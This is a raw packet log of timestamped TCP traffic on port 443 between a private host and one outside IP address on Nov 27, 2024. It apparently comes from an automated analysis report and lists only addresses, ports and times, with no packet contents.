Nov 27, 2024 16:29:40.832169056 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.838859081 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.838901997 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.838931084 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.838939905 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.839001894 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.839001894 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.844870090 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.844890118 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.844929934 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.844938993 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.844969988 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.844984055 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.851322889 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.851344109 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.851376057 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.851423979 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.851428986 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.851469040 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.858160019 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.858179092 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.858234882 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.858252048 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.858285904 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.858285904 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.864981890 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.865000963 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.865056992 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.865071058 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:40.865098953 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:40.865128040 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.019828081 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.019856930 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.019917011 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.019937038 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.019964933 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.019983053 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.026575089 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.026597977 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.026643991 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.026650906 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.026694059 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.033498049 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.033520937 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.033566952 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.033572912 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.033601046 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.033620119 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.039777040 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.039807081 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.039858103 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.039865017 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.039902925 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.039926052 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.046502113 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.046525002 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.046586037 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.046593904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.046624899 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.046650887 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.052781105 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.052824974 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.052865028 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.052870989 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.052896976 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.052916050 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.059602976 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.059629917 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.059782982 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.059791088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.059840918 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.066590071 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.066620111 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.066663980 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.066668987 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.066695929 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.066715002 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.221321106 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.221360922 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.221478939 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.221518993 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.221570015 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.228424072 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.228445053 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.228590965 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.228600025 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.228641033 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.234910011 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.234934092 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.235109091 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.235116959 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.235173941 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.241238117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.241264105 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.241367102 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.241378069 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.241420984 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.247697115 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.247735023 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.247864008 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.247869968 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.247904062 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.254437923 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.254458904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.254529953 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.254539013 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.254592896 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.261591911 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.261667967 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.261693001 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.261706114 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.261718988 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.261749983 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.267899036 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.267925024 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.267997980 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.268016100 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.268058062 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.423439980 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.423480988 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.423648119 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.423681974 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.423728943 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.427308083 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.427356958 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.427375078 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:41.427388906 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.427438021 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.427719116 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:41.427735090 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:43.173824072 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:43.173852921 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:43.173944950 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:43.174221039 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:43.174235106 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:44.667042017 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:44.667113066 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:44.667793989 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:44.667804003 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:44.668119907 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:44.668124914 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.156389952 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.156418085 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.156502008 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.156502008 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.156522989 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.156635046 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.228333950 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.228528976 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.358052969 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.358144999 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.380255938 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.380354881 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.397104025 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.397206068 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.413960934 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.414083958 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.558121920 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.558341026 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.573055983 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.573143959 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.587907076 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.588123083 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.605807066 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.605899096 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.615303040 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.615427971 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.624804020 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.625117064 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.635710001 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.635809898 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.751651049 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.751740932 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.759418011 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.759538889 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.768894911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.769010067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.781306028 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.781450987 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.790872097 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.790955067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.800307989 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.800530910 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.811285019 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.811507940 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.819856882 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.820154905 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.828569889 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.830167055 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.836864948 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.837053061 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.846710920 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.846843004 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.855040073 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.855138063 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.866178989 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.866269112 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.874661922 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.874923944 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.956553936 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.956789970 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.964119911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.964293003 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.970666885 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.970752001 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.977113008 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.977190018 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.983220100 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.983289003 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.991015911 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.991097927 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:45.996699095 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:45.996776104 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.002463102 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.002536058 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.005436897 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.005511045 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.009064913 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.009133101 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.012907982 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.012984037 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.016074896 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.016153097 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.019196033 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.019273043 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.022416115 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.022475004 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.026062965 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.026125908 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.029123068 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.029196978 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.159018040 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.159095049 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.162009954 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.162091017 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.165236950 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.165297031 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.168189049 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.168252945 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.172111988 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.172210932 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.175574064 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.175643921 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.178785086 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.178858042 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.182317019 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.182393074 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.185292959 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.185370922 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.188819885 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.188904047 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.191900015 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.192028046 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.195031881 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.195100069 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.198131084 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.198209047 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.210705996 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.210776091 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.213823080 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.213896036 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.216876030 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.216953993 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.355519056 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.355602980 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.358726025 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.358793974 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.362885952 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.362950087 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.366470098 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.366533041 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.369450092 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.369544029 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.372164011 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.372240067 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.376113892 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.376221895 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.378777027 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.378846884 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.381899118 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.381988049 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.385020971 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.385101080 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.388581038 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.388655901 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.392041922 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.392118931 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.396239042 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.396346092 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.399343967 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.399425983 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.401943922 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.402019024 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.405042887 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.405121088 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.408350945 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.408411980 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.559362888 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.559447050 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.562366009 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.562427998 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.565587997 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.565658092 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.569406033 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.569470882 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.572462082 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.572527885 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.575558901 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.575638056 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.578692913 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.578763962 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.582658052 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.582726955 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.585670948 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.585741997 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.589260101 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.589339018 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.592226982 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.592291117 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.595345974 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.595412970 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.599271059 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.599339008 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.612607956 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.612692118 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.615654945 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.615732908 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.618793011 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.618870020 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.759860039 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.759939909 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.763011932 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.763089895 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.767332077 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.767399073 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.769977093 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.770061970 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.772870064 CET	443	49731	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:46.772947073 CET	49731	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:46.775975943 CET	443	49731	79.141.173.158	192.168.2.4
